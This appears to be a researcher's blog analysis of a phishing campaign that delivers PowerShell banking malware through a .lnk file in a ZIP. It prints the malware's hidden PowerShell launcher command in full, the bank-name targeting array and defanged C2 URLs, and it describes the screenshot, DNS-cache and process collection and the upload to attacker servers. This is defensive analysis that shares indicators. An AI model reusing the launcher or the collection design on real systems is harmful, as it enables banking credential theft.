A lot of effort has gone into this infection attempt.
First, stolen information (recipients full name, address and telephone number) appear in the initial inbound e-mail into the victim.
When you click the link it hops through (not even sure how they allow this!) a McAfee reputation service domain.. which forwards you onto the malware domain.
The above page then provides you with a ZIP file that changes slightly each time (contains a different image file in the ZIP along with a windows .lnk file).
“order-complete-details.zip” containing “order-complete-details.lnk”.
The .lnk file, when clicked, runs:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $j="powershell -win hidden -c findstr /s dopretane $env:userprofile\*.lnk > $env:userprofile\Downloads\sent"."ps1; & $env:userprofile\Downloads\sent"."ps1"; start-process $j
This is come fairly clever code that seems to search the entire user folder for the malicious .lnk file and extracts a powershell script embedded at the end of the .lnk.
Ignoring all the obfuscation the script essentially downloads another script from
However.. this server will only send you a file if you download it using the “BITS” service built into windows. If you request it with a browser you get an error message and the server then stops responding to any further requests.
Upon successful download of the URL your computer is given another powershell script. This one then requests further URLs using BITS.
It then “ConvertTo-SecureString”‘s the files and stores it as config.ini and web.ini.
When these files are run it does further file fetches of:
A file containing just “sok” SHA256: ffa67ff84b797f1b99d6510d5f57e281ac0364228660497f2dac9a24b1b57cb8
A file of the same content as above.
It looks a bit like these are used as flags. If two sok’s are returned the powershell script will continue. If 60 seconds have passed and two sok’s are not returned it seems to kill the powershell process and end execution.
The next step is enumeration of the mapped network drives on the system into a variable ($dd) then seems to parse the strings into something a bit like json in $outD.
Lots of UK bank name variables are then loaded into an array:
$b = @("intesasanpaolo","inbank","unicredit","nwolb.com","bankline","bankofscotland.co.uk","bankofscotland.co.uk","secure.lloydsbank.co.uk","secure.halifax-online.co.uk","hsbc.co.uk","rbsdigital.com","barclays.co.uk","onlinebusiness.lloydsbank","tsb.co.uk","retail.santander.co.uk","business.santander.co.uk","onlinebanking.nationwide.co.uk");
The script takes 4 screenshots 40 seconds apart and saves them as “ScreenCaptureX” where X is 0 through 3.
$tt is loaded with the list of running processes (exe files that are currently running).
$dn is loaded with the cache of recent DNS hosts the computer has accessed (This will contain most websites and mailservers etc.. that have been recently accessed).
All this information is then posted to one of the two hostnames contained within the previous request to hostp1.txt.
The request above also includes a variable named “bu” which highlights if any of the above banking hostnames have appeared in the DNS cache. I.e. the hacker can collect data on which banks a specific infection has been visiting.
This URL then returns a command or “0”.
The command can be:
Downloads a file and runs it.
Looks like an auto update function for the malware
Updates the host names that are used for command and control
* anything else with a length longer than 3 characters will delete all the screenshots and then initiate another download from the URL given in the http response and then save and run it as a .exe file. Looks like a function to deploy further malware. ***SEE FURTHER BELOW REF1***
This command also then takes 6 more screenshots.
The next step, if none of the above are triggered, is to upload the screenshots that have been taken and then delete them from the disk using the following url on the Command and Control servers indicated in hostp1.txt
Logic code is also written into the powershell script to check the bits queue to make sure all pending uploads have been completed before it moves on!
It then sleeps for 10 minutes and runs everything above again on an infinite loop with 10 minute pauses.
If a banking url is identified in the “bu” variable (for example *hsbc.co.uk) then I managed to trigger the response “hxxps://afrigat.eu/sload/dedem/faq.txt” (and “hxxps://qasarer.eu/sload/dedem/faq.txt”)
VirusTotal started to scan the file.. then after a few results (some of which came up with SpyEyes or Ramnit (possibly part of the Zeus banking malware family?)) VirusTotal blanked the screen and came up with this unusual message.
However revisiting the page did return some results.
Some other indicators of this malware are “C:\necessi\Release\cheats.pdb” and “2b62a720-3ed1-47f8-bb98-d13fff48bc70”
Someone else has done pretty much the same digging into this malware with an almost identical blog post ;)